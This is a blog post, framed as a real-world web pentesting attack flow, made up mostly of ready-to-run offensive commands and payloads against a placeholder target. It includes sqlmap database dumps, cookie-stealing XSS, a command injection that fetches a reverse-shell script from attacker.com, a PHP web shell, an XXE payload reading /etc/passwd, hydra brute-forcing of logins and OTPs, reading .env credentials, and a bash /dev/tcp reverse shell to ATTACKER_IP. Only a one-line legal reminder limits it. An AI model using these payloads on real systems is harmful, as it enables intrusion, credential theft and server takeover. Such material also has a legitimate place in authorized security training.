Hack the Web: Real-World Web Application Pentesting Flow

Forget theory, this is how real hackers test web apps. From recon to RCE, here's the step-by-step attack flow used in the wild.

Posted Mar 10, 2025 Updated Feb 3, 2026

By Elimane Juuf

3 min read

“The surface is just HTML. The real vulnerabilities hide behind logic, endpoints, and trust.”

1. Web Reconnaissance

Subdomain & Directory Hunting

  
subfinder -d target.com -o subs.txt
dirsearch -u https://target.com -e php,js,html,asp
sublist3r -d target.com -o subdomains.txt

Tech Fingerprinting

  
whatweb https://target.com
nmap -sV -p 80,443 target.com
httpx -status-code -tech-detect -title -silent > live.txt

Look for forgotten admin panels, hidden APIs, staging servers, or unused subdomains that could be entry points.

Web Server and Firewall Fingerprinting

wappalyzer https://target.com
nmap -p 80,443 --script http-enum target.com

2. Analyze Request/Response Flow

Use Burp Suite or ZAP to:

Intercept all HTTP traffic
Analyze parameters, cookies, headers
Identify auth flows, tokens, session handling

Check for insecure direct object references (IDOR), CSRF, broken access control, and token leakage.

Analyzing Cookies and Session Management

  
curl -I -X GET https://target.com/login | grep "Set-Cookie"

Check for:

Cookie flags (HttpOnly, Secure, SameSite)
Session fixation or weak session management

3. Input-Based Attacks

SQL Injection

' OR 1=1-- -

  
sqlmap -u "https://target.com/product?id=3" --dbs --level=5 --risk=3
sqlmap -u "https://target.com/index.php?user=admin&pass=' OR 1=1 --" --dump

Advanced SQLi Commands:

  
sqlmap -u "https://target.com/item?id=1" --union-cols=10 --union-char=1 --batch --dbs

XSS (Reflected / Stored)

  
"><script>alert('XSS')</script>

Advanced XSS: Test for stored XSS in profile, comment, and feedback forms.
1 <script>alert(document.cookie)</script>

Command Injection

  
127.0.0.1; whoami
curl -X GET "https://target.com/?id=$(curl attacker.com/reverse-shell.sh)"

4. Authentication Bypass & Bruteforce

Brute POST Logins

  
hydra -l admin -P rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid login"

Check for:

Default creds (admin:admin)
No rate limiting
Leaked password reset endpoints

OTP Bypass (Token Brute Force)

  
hydra -l admin -P otp_list.txt target.com http-post-form "/login:username=^USER^&password=^PASS^&otp=^OTP^:Invalid login"

Bypassing CAPTCHA

  
gocr -c 0 -i captcha.png > captcha_output.txt

5. Exploit Misconfigurations

File Upload → RCE

  
<?php system($_GET['cmd']); ?>

Upload and access:

/uploads/shell.php?cmd=id

Exposed Git repo

curl target.com/.git/config

Then use:

git-dumper https://target.com/.git/ dumped-site/

SSTI / XXE / SSRF

Test payloads in templates, XML parsers, and image URLs:

<!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Exploiting API Endpoints (API Rate Limiting)

  
curl -X GET https://target.com/api/v1/products --header "Authorization: Bearer YOUR_TOKEN"

Check for:

Rate limiting bypass via multiple tokens or IP addresses

6. Advanced Tricks

JWT token cracking: try john, jwt_tool, weak secrets
1 jwt_tool -t token.jwt

Deserialization: look for serialized objects in cookies or POST

  
echo "serialized_object" | python -c 'import pickle; print(pickle.loads(input()))'

CSP bypass → steal sessions with clever XSS

  
<script src="https://attacker.com/malicious.js"></script>

7. Post-Exploitation

Once you get RCE or access:

Enumerate server (whoami, uname -a, netstat -tunlp)
1 2 3 whoami uname -a netstat -tunlp

Dump .env, config files, DB creds

cat /var/www/.env
cat /var/www/config.php

Pivot into internal admin panels
Upload web shells or reverse shells (use weevely, nishang, php-reverse-shell)
1 weevely generate shell.php password

Use reverse shell techniques:

  
nc -lvnp 4444
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

8. Exploiting Server Misconfigurations

Nginx / Apache Configs

cat /etc/nginx/nginx.conf
cat /etc/apache2/sites-available/000-default.conf

Look for:

Misconfigured Server headers
Exposed sensitive paths

Docker and Kubernetes Misconfigurations

docker exec -it container_name bash

Look for:

Exposed Docker APIs
Vulnerabilities in running containers

Tools You’ll Want

Tool	Use Case
`Burp Suite`	Intercept, test, automate
`sqlmap`	SQL injection + DB takeover
`ffuf`	Fuzzing parameters/directories
`wpscan`	WordPress vulnerability scanning
`jwt_tool`	JWT analysis + cracking
`gf`, `nuclei`	Pattern + vuln scanning
`git-dumper`	Dump exposed git repositories
`dirsearch`	Directory brute-forcing
`hydra`	Brute force various services
`gocr`	CAPTCHA cracking
`weevely`	Web shell management

Legal Reminder

Authorized pentests only. Targeting random websites is illegal, stay ethical.

Attack Flow Summary

Recon (subdomains, dirs, tech stack)
Analyze HTTP logic (auth, roles, sessions)
Inject payloads (XSS, SQLi, LFI, RCE)
Abuse logic flaws & misconfig
Post-exploitation & lateral access

Next Steps / Labs

Hack The Box: Injection, Traverxec, Jeeves, SwagShop
Try OWASP Juice Shop or DVWA
Practice on real bug bounty programs (HackerOne, Bugcrowd)

“The best payload isn’t in a list. It’s in your head.”

Pentesting

This post is licensed under CC BY 4.0 by the author.

1. Web Reconnaissance

Subdomain & Directory Hunting

Tech Fingerprinting

Web Server and Firewall Fingerprinting

2. Analyze Request/Response Flow

Analyzing Cookies and Session Management

3. Input-Based Attacks

SQL Injection

XSS (Reflected / Stored)

Command Injection

4. Authentication Bypass & Bruteforce

Brute POST Logins

OTP Bypass (Token Brute Force)

Bypassing CAPTCHA

5. Exploit Misconfigurations

File Upload → RCE

Exposed Git repo

SSTI / XXE / SSRF

Exploiting API Endpoints (API Rate Limiting)

6. Advanced Tricks

7. Post-Exploitation

8. Exploiting Server Misconfigurations

Nginx / Apache Configs

Docker and Kubernetes Misconfigurations

Tools You’ll Want

Legal Reminder

Attack Flow Summary

Next Steps / Labs

Trending Tags